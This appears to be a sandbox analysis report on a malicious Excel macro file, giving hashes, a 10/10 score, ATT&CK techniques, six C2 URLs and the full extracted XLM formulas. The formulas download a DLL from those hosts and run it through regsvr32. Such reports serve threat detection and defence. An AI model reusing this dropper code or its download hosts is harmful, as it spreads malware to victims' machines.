816139a521f5f7194347aea048e100b8893fa8ce7d6a86910a72bb190425e553

General

Target

RLP1964598032xlsm.xlsm
Size

46KB
Sample

230701-h4hgraha5x
MD5

8d9e59e5063fe4fdc5eb1f7e4f242405
SHA1

c767e1544bbd7ea7c33d7d8034ef266c8d9f01a6
SHA256

816139a521f5f7194347aea048e100b8893fa8ce7d6a86910a72bb190425e553
SHA512

dacde4954db52f6dd220cc959e2434d88d9be58d517e4daeda68be650516caf81e64fa6b69e09a4ce7e1d03cf2021a470c214e8356d9671d6ee300104d24b40f
SSDEEP

768:QmBlntZhEI2YmxNskmoKjBvK3HqK88F/G6YzATUfJnXYS6oRM:hBlntTEvDLmXi3JvG6YzATOJnXYSXRM

Score

10^/10

macro xlm

Malware Config

Extracted

Rule

Excel 4.0 XLM Macro

C2

http://eles-tech.com/css/KzMysMqFMs/

http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/

https://txpcrescue.com/cgi-bin/5tSO8/

http://hadramout21.com/jetpack-temp/Py/

http://haribuilders.com/zoombox-master/4HYGX/

http://hansen-arnal.com/cp/iiTrAeEtvOwmjjekWgI/

Attributes

formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://eles-tech.com/css/KzMysMqFMs/","..\xewn.dll",0,0) =IF('PIMKE'!C14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/","..\xewn.dll",0,0)) =IF('PIMKE'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://txpcrescue.com/cgi-bin/5tSO8/","..\xewn.dll",0,0)) =IF('PIMKE'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hadramout21.com/jetpack-temp/Py/","..\xewn.dll",0,0)) =IF('PIMKE'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://haribuilders.com/zoombox-master/4HYGX/","..\xewn.dll",0,0)) =IF('PIMKE'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hansen-arnal.com/cp/iiTrAeEtvOwmjjekWgI/","..\xewn.dll",0,0)) =IF('PIMKE'!C24<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll") =RETURN()

Extracted

Language

xlm4.0

Source

URLs

xlm40.dropper

http://eles-tech.com/css/KzMysMqFMs/

xlm40.dropper

http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/

Targets

- Target
  
  RLP1964598032xlsm.xlsm
- Size
  
  46KB
- MD5
  
  8d9e59e5063fe4fdc5eb1f7e4f242405
- SHA1
  
  c767e1544bbd7ea7c33d7d8034ef266c8d9f01a6
- SHA256
  
  816139a521f5f7194347aea048e100b8893fa8ce7d6a86910a72bb190425e553
- SHA512
  
  dacde4954db52f6dd220cc959e2434d88d9be58d517e4daeda68be650516caf81e64fa6b69e09a4ce7e1d03cf2021a470c214e8356d9671d6ee300104d24b40f
- SSDEEP
  
  768:QmBlntZhEI2YmxNskmoKjBvK3HqK88F/G6YzATUfJnXYS6oRM:hBlntTEvDLmXi3JvG6YzATOJnXYSXRM
Score

10^/10
- Process spawned unexpected child process
  This typically indicates the parent process was compromised via an exploit or macro.
behavioral1 behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks

Sharing

General

Malware Config

Extracted

Extracted

Targets

Process spawned unexpected child process

MITRE ATT&CK Matrix ATT&CK v6

Tasks

static1

behavioral1

behavioral2